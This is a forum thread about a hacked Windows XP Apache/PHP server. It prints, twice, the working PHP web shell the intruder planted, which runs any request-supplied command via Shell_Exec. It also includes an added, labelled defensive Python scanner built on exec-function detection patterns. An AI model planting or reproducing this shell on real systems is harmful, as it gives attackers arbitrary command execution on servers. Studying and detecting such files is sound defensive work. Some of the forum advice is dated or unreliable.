

Problem with hacking my computer





JayBee
My problem is to find the hole in my computer. Some hacker used my running Apache with PHP to hack my computer while I was debugging my web pages. He saved a script called sh3ll.php in my HTTP root directory and he executes the commands he wants, like stop firewall, tftp, start his ftp.
I have Windows XP Home, Apache 2.0.55, PHP 5.1.2 and phpMyAdmin.

I have a suspicion that he got through phpMyAdmin (I found some activity in the Apache log).

Could somebody help me?

(I want to find the hole; I don't want to disable Apache in the firewall for public use, because I want it.)
devroom
Don't really know what you mean, but restart the computer in safe mode.
Run a virus scan and change settings.
But the most important thing: remove the bad file.

Hope it will work.
TheGeek
Sounds like you just need to go into Apache while in safe mode and NOT HOOKED UP TO THE INTERNET!!!! and just remove that file. That will make sure that he isn't trying to execute anything, and it won't start up when the computer does because it's safe mode. It probably wouldn't be a bad idea to run a virus scan while you're in there, but from the sounds of it, it's probably not necessary. Also change all your passwords and stuff; that way any data that he has collected while he is on your computer is useless to him. Another good thing to do when running a server off a personal computer of your own is to make sure you're behind a good bit of firewall protection. Make sure that ports are blocked on your router, and make sure that if there is any kind of software firewall running on your machine, you use that to block a bunch of ports as well.

The best idea would be to not run a server on a WinXP Home computer to start with, however. By nature, it's insecure, and making it a server is probably not the wisest thing. If you're gonna run a server, use either Win 2003, 2000 or some distro of Linux if you really want security....
Nyizsa
Sorry for being a bit off-topic:
I run Linux (Debian) on my computer, with Apache installed. And it works as a server also. (However I don't use it as one.) I took a Shields UP! test (which I recommend for all of you - especially Windows users), and it identified some security issues. But all of them were like "On Windows it can lead to..." "Due to a security flaw in Windows..." and so on.
My question is: do I need to install any security software? A firewall or something? Or am I safe?
JayBee
There is no virus, because I have a good antivirus with automatic virus deletion. But the hacker was stupid when he stopped the firewall, because the Windows bubble system told me that the computer was being hacked, so I whipped out the LAN cable and started watching for the problem.

He only uploaded the file with this content. It is so silly, but it works well.


Code:
<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF" onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><input type=TEXT name="-cmd" size=64 value="<?$cmd?>" style="background:#000000;color:#FFFFFF;"><pre><?
if ($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>


and the same with spaces

Code:
<? $cmd = $_REQUEST["-cmd"]; ?>
<html>
    <head>
        <title>SH3LL</title>
    </head>
    <body bgcolor=#000000 text=#FFFFFF" onLoad="document.forms[0].elements[-cmd].focus()">
        <form method=POST>
            <input type=TEXT name="-cmd" size=64 value="<?$cmd?>" style="background:#000000;color:#FFFFFF;">
            <pre><? if ($cmd != "") print Shell_Exec($cmd); ?></pre>
        </form>
    </body>
</html>



and I think that it isn't a virus.

I can't use another Windows, because I don't have one. I bought my laptop with Win XP Home and I don't want to do anything with it, because I want to run some "only Windows programs" and I don't have time to play with Wine in Linux.
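
A defender's follow-up to the file posted above, as an added example that is not part of the original thread: a Python sketch that walks a document root and flags PHP files where request data reaches a command-execution function. The function names, extension list and sample files are assumptions constructed for illustration; the regexes are a heuristic and will not catch obfuscated code.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that run operating-system commands.
EXEC_CALL = re.compile(
    r"\b(?:shell_exec|exec|system|passthru|popen|proc_open)\s*\(([^)]*)\)", re.I)
# Superglobals that carry client-controlled request data.
REQUEST_VAR = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
# Local variables assigned straight from request data: $cmd = $_REQUEST[...]
TAINT_ASSIGN = re.compile(r"(\$\w+)\s*=\s*" + REQUEST_VAR)


def scan_php_source(source):
    """Return the command-execution calls in `source` fed by request data."""
    tainted = set(TAINT_ASSIGN.findall(source))
    hits = []
    for call in EXEC_CALL.finditer(source):
        args = call.group(1)
        direct = re.search(REQUEST_VAR, args)
        via_var = any(re.search(re.escape(v) + r"\b", args) for v in tainted)
        if direct or via_var:
            hits.append(call.group(0))
    return hits


def scan_docroot(root, exts=(".php", ".phtml", ".inc")):
    """Walk `root`; map each flagged file (relative path) to its hits."""
    flagged = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_php_source(path.read_text(encoding="latin-1"))
            if hits:
                flagged[path.relative_to(root).as_posix()] = hits
    return flagged


def demo():
    """Scan a throwaway docroot holding two constructed sample files."""
    samples = {
        # Constructed sample with the same shape as the file posted above.
        "sh3ll.php": '<? $cmd = $_REQUEST["-cmd"]; if ($cmd != "") print Shell_Exec($cmd); ?>',
        # Constructed benign page: fixed command, request data only echoed.
        "status.php": '<?php echo shell_exec("uptime"); echo htmlspecialchars($_GET["n"]); ?>',
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            Path(root, name).write_text(body)
        return scan_docroot(root)
```

Pointing `scan_docroot` at the real Apache document root lists the files to review by hand; an unexpected file there is worth checking against the access log even when the scanner stays silent.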
devroom
so a stupid hacker
MonkeyWrench
Buy Norton Internet Security; the firewall on it is brilliant. I used to get hacked so much, but then it stopped everything.
JayBee
I only once installed "Norton Internet Security" and it was a horrible experience.
OK, it stops hackers from infiltrating my computer, but it also stops all my work.
I have a Sempron @ 1600MHz. The slowdown was so radical.
It worked like my Pentium MMX @ 266MHz that I have without firewall and antivirus.
(boot time, copying files, time of starting the same applications, ... all was almost the same)


Hard times for computing.
steveadams617
You can limit which IP addresses can come in on apache. Just make it so that only localhost 127.0.0.1 can come in:

http://httpd.apache.org/docs/1.3/mod/mod_access.html
JayBee
Exactly, it is something that can solve my problem:
.htaccess with allow/deny.

I was googling for this problem, and I found that I have an old phpMyAdmin with this security hole: Local file inclusion vulnerability

So what am I? ............ I'm stupid.